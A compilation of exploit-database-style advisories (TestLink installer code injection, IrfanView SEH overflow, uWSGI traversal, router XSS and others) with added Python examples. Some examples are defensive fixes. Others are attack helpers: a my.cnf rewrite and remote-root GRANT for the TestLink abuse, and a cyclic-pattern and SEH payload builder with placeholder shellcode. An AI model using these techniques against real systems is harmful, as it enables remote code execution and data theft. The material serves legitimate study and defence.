TestLink (versions below 1.9.17) is vulnerable to remote code execution. The vulnerable code is in 'install/installNewDB.php'. TestLink allows itself to be re-installed: a user who visits the '/install/' directory and reaches the 'Database detail' page ('install/installNewDB.php') can enter PHP code in the 'TestLink DB login' field, and after a successful installation that PHP code is saved into the configuration file. During installation the script first tries to connect to the MySQL server as the 'root' account supplied on the form; if it can connect (to a locally or remotely hosted server), installation proceeds and the script saves the MySQL host, username and password in the config file. An attacker can abuse this step to write PHP code into the config file. To do so, the attacker sets up a MySQL server that accepts connections from remote IPs, which only requires a change in my.cnf: comment out 'skip-networking' and any 'bind-address' line (change 'skip-networking' to '# skip-networking' and 'bind-address = some_ip' to '#bind-address = some_ip'), save the file and reload/restart MySQL, after which the server accepts connections from any remote IP. The MySQL 'root' user must also be configured so that a remote client can authenticate as it. With that in place, the attacker points the installer at the attacker-controlled MySQL server by supplying its credentials and enters the PHP code in the 'TestLink DB login' field.
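The attacker-side MySQL preparation described above, plus the input check the installer was missing, as an added example (not TestLink's code and not part of the original advisory). The my.cnf text is constructed, the 'root' password is a placeholder, and the 32-character identifier limit is the MySQL user-name limit assumed for the defender-side check:

```python
import re

# Constructed sample my.cnf modeled on a default that only listens locally.
SAMPLE_MY_CNF = """\
[mysqld]
skip-networking
bind-address = 127.0.0.1
port = 3306
datadir = /var/lib/mysql
"""

# Uncommented directives that keep mysqld off the network. A line already
# starting with '#' does not match, so re-running the transform is harmless.
_LISTEN_RESTRICTIONS = re.compile(r"^\s*(skip-networking|bind-address\s*=.*)\s*$")


def listen_restrictions(cnf_text):
    """Return the active skip-networking / bind-address directives in cnf_text."""
    return [line.strip() for line in cnf_text.splitlines() if _LISTEN_RESTRICTIONS.match(line)]


def open_mysql_to_remote(cnf_text):
    """Comment out skip-networking and bind-address so mysqld listens on every
    interface once it is restarted (the my.cnf change the advisory describes)."""
    out = []
    for line in cnf_text.splitlines():
        out.append(f"# {line.strip()}" if _LISTEN_RESTRICTIONS.match(line) else line)
    return "\n".join(out) + "\n"


def remote_root_grant_sql(password):
    """SQL to run on the attacker's own server so that 'root' may authenticate
    from any host. The password is a placeholder; single quotes are doubled so
    it stays inside the SQL string literal."""
    pw = password.replace("'", "''")
    return (
        f"CREATE USER IF NOT EXISTS 'root'@'%' IDENTIFIED BY '{pw}';\n"
        "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION;\n"
        "FLUSH PRIVILEGES;\n"
    )


# Defender-side check the installer lacked: a DB login is a plain identifier.
# Quotes, angle brackets, '$', '(' and so on have no business in a value that
# is copied verbatim into a PHP config file. 32 is the assumed MySQL limit.
_SAFE_LOGIN = re.compile(r"^[A-Za-z0-9_]{1,32}$")


def is_safe_db_login(value):
    return bool(_SAFE_LOGIN.match(value))


if __name__ == "__main__":
    print(open_mysql_to_remote(SAMPLE_MY_CNF))
    print(remote_root_grant_sql("CHANGE_ME"))
    print(is_safe_db_login("testlink_user"), is_safe_db_login("<?php phpinfo(); ?>"))
```

After writing the rewritten my.cnf back, mysqld has to be restarted for the listening change to take effect; the GRANT statements take effect immediately. The identifier check is what a fixed installer should apply to the 'TestLink DB login' field before the value is ever written to disk.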
This is proof-of-concept code for a stack-based buffer overflow in iSumsoft ZIP Password Refixer 3.1.1. The vulnerability is caused by a boundary error when handling user-supplied data: a specially crafted, overly long string passed to the vulnerable application overflows a stack buffer, which may allow an attacker to execute arbitrary code.
The uWSGI PHP plugin before 2.0.17 is vulnerable to directory traversal when used without the "php-allowed-docroot" option. The vulnerability exists because the file path is not properly validated when a resource is requested under the DOCUMENT_ROOT directory specified via "php-docroot". A remote attacker can exploit this to read arbitrary files from the vulnerable system using path traversal sequences ("..%2f", the URL-encoded form of "../").
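The mapping from request path to file below the document root, shown weak and hardened side by side, as an added example that is not uWSGI's code. The docroot value is assumed; the hardened version is modeled on the containment check that an allowed-docroot option provides, not copied from uWSGI:

```python
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/app"  # assumed value standing in for php-docroot


def naive_docroot_path(docroot, request_path):
    """Weak mapping: percent-decode once, glue onto the docroot, normalize.
    '..' segments are honoured, so '..%2f' sequences climb out of docroot."""
    relative = unquote(request_path).lstrip("/")
    return posixpath.normpath(posixpath.join(docroot, relative))


def is_within_docroot(docroot, candidate):
    """True only if candidate is docroot itself or a path below it.
    commonpath() compares whole segments, so '/var/www/app2' is not under
    '/var/www/app' even though it shares the string prefix."""
    docroot = posixpath.normpath(docroot)
    return posixpath.commonpath([docroot, candidate]) == docroot


def resolve_docroot_path(docroot, request_path):
    """Hardened mapping: same decode + normalize, then refuse anything whose
    normalized form is not under docroot. Decoding happens exactly once, as the
    server does, so a double-encoded '%252f' stays a literal '%2f' inside a file
    name and never becomes a separator."""
    candidate = naive_docroot_path(docroot, request_path)
    if not is_within_docroot(docroot, candidate):
        raise PermissionError(f"{request_path!r} escapes {docroot}")
    return candidate


if __name__ == "__main__":
    probe = "/..%2f..%2f..%2fetc/passwd"
    print("weak   :", naive_docroot_path(DOCROOT, probe))
    try:
        print("hardened:", resolve_docroot_path(DOCROOT, probe))
    except PermissionError as err:
        print("hardened:", err)
```

The check operates on the normalized path, not on the file system; if the docroot can contain symlinks pointing outside it, apply the same containment test to the resolved path (realpath) as well.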
Remote unauthenticated attackers can crash the "Proxy.exe" server component of the DualDesk application, which listens on TCP port 5500, by sending a long string of junk characters.
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command.
A persistent cross-site scripting vulnerability exists in D-Link DIR-600M Wireless routers with firmware version 3.01. An attacker can inject malicious JavaScript code into the router's web interface by creating a user with a specially crafted name. The code will be executed when the router's web interface is accessed by an authenticated user.
The IrfanView 4.50 Email PlugIn is vulnerable to a local buffer overflow when a maliciously crafted file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the saved handler address with a pointer that redirects execution to the shellcode.
A local buffer overflow vulnerability exists in the IrfanView 4.44 Email PlugIn. To trigger it, generate a malicious irfan.txt file and copy its contents to the clipboard; open IrfanView and a sample image from My Pictures; select Options, then Send by Email, then Settings; paste the clipboard contents into the Full Name field and click OK. The application crashes and the proof-of-concept payload launches calc.exe.
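The two building blocks behind the stack-overflow entries above (the iSumsoft, DualDesk and IrfanView proofs of concept), as an added example that is not taken from any of those PoCs: a cyclic pattern to locate the overwrite offset from a crash, and the SEH-overwrite layout the IrfanView description refers to. Every offset, address and shellcode stub here is a placeholder; a real PoC takes the offset from the debugger and the handler address from a non-SafeSEH module in the target process.

```python
import string


def pattern_create(length):
    """Metasploit-style cyclic pattern of 'Upper lower digit' triplets. It does not
    repeat within 20280 bytes, so any 4 bytes recovered from a register or from the
    SEH record after the crash map back to exactly one offset in the input."""
    chunks = []
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                chunks.append(a + b + c)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def pattern_offset(pattern, value):
    """value is either the 4 ASCII bytes seen in the debugger (e.g. 'a1Aa') or the
    32-bit register value (e.g. 0x61413161), which is decoded little-endian."""
    needle = value.to_bytes(4, "little").decode("ascii") if isinstance(value, int) else value
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError(f"{needle!r} not found in pattern")
    return idx


def build_seh_payload(nseh_offset, handler_addr, shellcode, total_len, nop_sled=16):
    """Classic SEH overwrite layout:
    [junk up to nSEH][nSEH: 'jmp short +6' over the handler slot][SEH: address of a
    pop/pop/ret gadget][NOP sled][shellcode][padding to total_len].
    EB 06 jumps 6 bytes past the end of the jmp: over the two NOPs that pad nSEH and
    over the 4-byte handler address, landing on the NOP sled."""
    nseh = b"\xeb\x06\x90\x90"
    seh = handler_addr.to_bytes(4, "little")
    body = b"A" * nseh_offset + nseh + seh + b"\x90" * nop_sled + shellcode
    if len(body) > total_len:
        raise ValueError("payload does not fit in total_len")
    return body + b"D" * (total_len - len(body))


if __name__ == "__main__":
    # Step 1: crash the target with a pattern, read 4 bytes from the SEH record.
    pattern = pattern_create(3000)
    print("nSEH offset for 'a1Aa':", pattern_offset(pattern, 0x61413161))
    # Step 2: rebuild the input with the real layout (placeholder values here).
    poc = build_seh_payload(nseh_offset=1000, handler_addr=0x41424344,
                            shellcode=b"\xcc" * 4, total_len=3000)
    print(len(poc), "bytes ready to write to the crafted file or send to the socket")
```

The same pattern doubles as the "long string of junk" for a pure crash PoC such as the DualDesk one; using a pattern instead of "A" * n costs nothing and tells you immediately whether the overwrite is controllable.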
Routers2 is vulnerable to reflected cross-site scripting via the 'rtr' GET parameter of the page=graph action in `cgi-bin/routers2.pl`.
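The output-encoding and allow-list fixes for both the persistent (D-Link DIR-600M user name) and the reflected (Routers2 'rtr' parameter) cross-site scripting entries above, as one added example that is not code from either product. The markup, the probe string and the router list are constructed; the name pattern is an assumed policy:

```python
import re
from html import escape
from urllib.parse import parse_qs

# Constructed probe and a matching percent-encoded query string.
XSS_PROBE = "<script>alert(1)</script>"
PROBE_QUERY = "page=graph&rtr=%3Cscript%3Ealert%281%29%3C%2Fscript%3E"


# --- Persistent case: a stored user name is echoed into the admin UI -------
def render_user_row_unsafe(username):
    return f"<tr><td>{username}</td></tr>"


def render_user_row(username):
    # escape() handles the HTML-body and attribute contexts; it is not enough
    # for a value dropped inside a <script> block or a URL.
    return f"<tr><td>{escape(username, quote=True)}</td></tr>"


_NAME_OK = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")  # assumed account-name policy


def accept_username(username):
    """Input-side check at account creation. Output escaping is still required:
    the allow-list protects this field, escaping protects every other sink."""
    return bool(_NAME_OK.match(username))


# --- Reflected case: a query parameter is echoed into the page -------------
def rtr_from_query(query_string):
    return parse_qs(query_string, keep_blank_values=True).get("rtr", [""])[0]


def render_graph_title_unsafe(query_string):
    return f"<h1>Graph: {rtr_from_query(query_string)}</h1>"


def render_graph_title(query_string, known_routers):
    """'rtr' names a configured router, so it can be allow-listed against the
    configuration; escape anyway in case the router list itself carries odd names."""
    rtr = rtr_from_query(query_string)
    if rtr not in known_routers:
        return "<h1>Unknown router</h1>"
    return f"<h1>Graph: {escape(rtr, quote=True)}</h1>"


def contains_raw_script(html):
    """Crude sink check used below: did a <script tag survive into the output?"""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_user_row_unsafe(XSS_PROBE))
    print(render_user_row(XSS_PROBE))
    print(render_graph_title_unsafe(PROBE_QUERY))
    print(render_graph_title(PROBE_QUERY, {"core-rtr1", "edge-rtr2"}))
```

The persistent and reflected cases differ only in where the attacker's string comes from (the user database versus the current request); the sink is the same, and so is the fix: encode for the context at output time and validate against what the field is actually allowed to contain.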
This exploit supports 5.01 (possibly other versions as well). It is based on CVE-2017-7005, PegaSwitch and the 4.0x exploit by qwertyoruiopz. It requires the latest version of Node.js from nodejs.org; run `npm install` and then `npm start`.